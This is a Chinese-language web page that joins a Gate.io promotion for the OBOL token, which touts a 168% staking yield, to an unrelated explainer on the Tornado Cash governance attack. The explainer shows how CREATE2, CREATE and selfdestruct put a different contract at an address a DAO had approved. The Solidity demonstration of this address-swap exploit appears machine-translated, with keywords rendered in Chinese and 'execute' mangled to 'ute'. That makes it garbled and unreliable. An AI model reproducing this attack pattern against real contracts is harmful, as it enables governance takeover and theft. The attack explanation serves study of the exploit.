OBOL 項目分享活動開啓!調研 Obol (OBOL) 項目,在Gate.io動態發布您的看法觀點,瓜分 $100 OBOL!
💰️ 選取10名優質發帖用戶,每人輕鬆贏取 $10 OBOL 獎勵!
項目簡介:
Obol 致力於分布式、去中心化和民主化未來的數字基礎設施——從以太坊開始,並擴展到整個 Web3 平台。作爲 Layer 1 區塊鏈和去中心化基礎設施網路的基礎,Obol Collective 擁有全球最大的去中心化運營商生態系統。目前,全球超過 800 個去中心化運營商運行 Obol 分布式驗證器 (DV),保障主網超過 10 億的資產安全,Obol 正在賦能下一代去中心化系統。
參與方式:
1.調研$OBOL項目,發表你對項目的見解。具體可包含但不限於:
🔹 Obol 是什麼?
🔹 Obol 去中心化驗證器有何優點?
🔹 $OBOL 代幣經濟模型如何運作?
2.帶上$OBOL現貨交易連結:https://www.gate.io/trade/OBOL_USDT
3.推廣$OBOL Launchpool 質押挖礦活動,分享OBOL Launchpool 參與步驟及質押福利,質押$GT、$BTC、$OBOL 免費瓜分2,250,000 $OBOL空投獎勵,年華收益率高達168%:https://www.gate.io/launchpool/OBOL?pid=291
Tornado治理攻擊:如何同一個地址上部署不同的合約
大概兩週前(5 月20 日),知名混幣協議Tornado Cash 遭受到治理攻擊,黑客獲取到了Tornado Cash的治理合約的控制權(Owner)。
攻擊過程是這樣的:攻擊者先提交了一個“看起來正常”的提案, 待提案通過之後, 銷毀了提案要執行的合約地址, 並在該地址上重新創建了一個攻擊合約。
攻擊過程可以查看SharkTeam 的Tornado.Cash提案攻擊原理分析 [1] 。
這裡攻擊的關鍵是在同一個地址上部署了不同的合約, 這是如何實現的呢?
背景知識
EVM 中有兩個操作碼用來創建合約:CREATE 與CREATE2 。
CREATE 操作碼
當使用new Token() 使用的是CREATE 操作碼, 創建的合約地址計算函數為:
地址 tokenAddr = bytes20(keccak256(senderAddress, nonce))
創建的合約地址是通過創建者地址 + 創建者Nonce(創建合約的數量)來確定的, 由於Nonce 總是逐步遞增的, 當Nonce 增加時,創建的合約地址總是是不同的。
CREATE2 操作碼
當添加一個salt時new Token{salt: bytes32()}() ,則使用的是CREATE2 操作碼, 創建的合約地址計算函數為:
地址 tokenAddr = bytes20(keccak256(0xFF, senderAddress, salt, bytecode))
創建的合約地址是創建者地址 + 自定義的鹽 + 要部署的智能合約的字節碼, 因此只有相同字節碼和使用相同的鹽值,才可以部署到同一個合約地址上。
那麼如何才能在同一地址如何部署不用的合約?
攻擊手段
攻擊者結合使用Create2 和Create 來創建合約, 如圖:
先用Create2 部署一個合約Deployer , 在Deployer 使用Create 創建目標合約Proposal(用於提案使用)。 Deployer 和Proposal 合約中均有自毀實現(selfdestruct)。
在提案通過後,攻擊者把Deployer 和Proposal 合約銷毀,然後重新用相同的slat創建Deployer , Deployer 字節碼不變,slat 也相同,因此會得到一個和之前相同的Deployer 合約地址, 但此時Deployer 合約的狀態被清空了, nonce 從0 開始,因此可以使用該nonce 創建另一個合約Attack。
攻擊代碼示例
此代碼來自:
// SPDX 許可證標識符:MIT pragma solidity ^0.8.17; 合約 DAO { 結構提案 { 地址目標; 布爾批准; 布爾泰特; } 地址 public owner = msg.sender; Proposal[] 公開提案; 功能批准(地址目標)外部{ require(msg.sender == owner, "未授權"); proposals.push(提案({target: target, approved: true, uted: false})); } 函數 ute(uint256 proposalId) 外部應付款 { 提案存儲提案 = proposals [proposalId] ; 要求(提案。批准,“未批准”); 要求(!proposal.uted,“uted”); proposal.uted = true; (bool ok, ) = proposal.target.delegatecall( abi.encodeWithSignature("uteProposal()") ); require(ok, "委託調用失敗"); } } 合同提案{ 事件日誌(字符串消息); 函數 uteProposal() 外部 { emit Log("DAO 批准的執行代碼"); } 函數 emergencyStop() 外部 { 自毀(應付(地址(0))); } } 合同攻擊{ 事件日誌(字符串消息); 地址公共所有者; 函數 uteProposal() 外部 { emit Log("執行的代碼未被 DAO 批准 :)"); // 例如 - 將 DAO 的所有者設置為攻擊者 owner = msg.sender; } } 合約 DeployerDeployer { 事件日誌(地址地址); 函數部署()外部{ bytes32 salt = keccak256(abi.encode(uint(123))); 地址addr =地址(新部署者{salt:salt}()); 發出日誌(地址); } } 合同部署者{ 事件日誌(地址地址); 函數 deployProposal() 外部 { 地址地址=地址(新提案()); 發出日誌(地址); } 函數 deployAttack() 外部 { 地址地址=地址(新攻擊()); 發出日誌(地址); } 函數 kill() 外部 { 自毀(應付(地址(0))); } }
大家可以使用該代碼自己在Remix 中演練一下。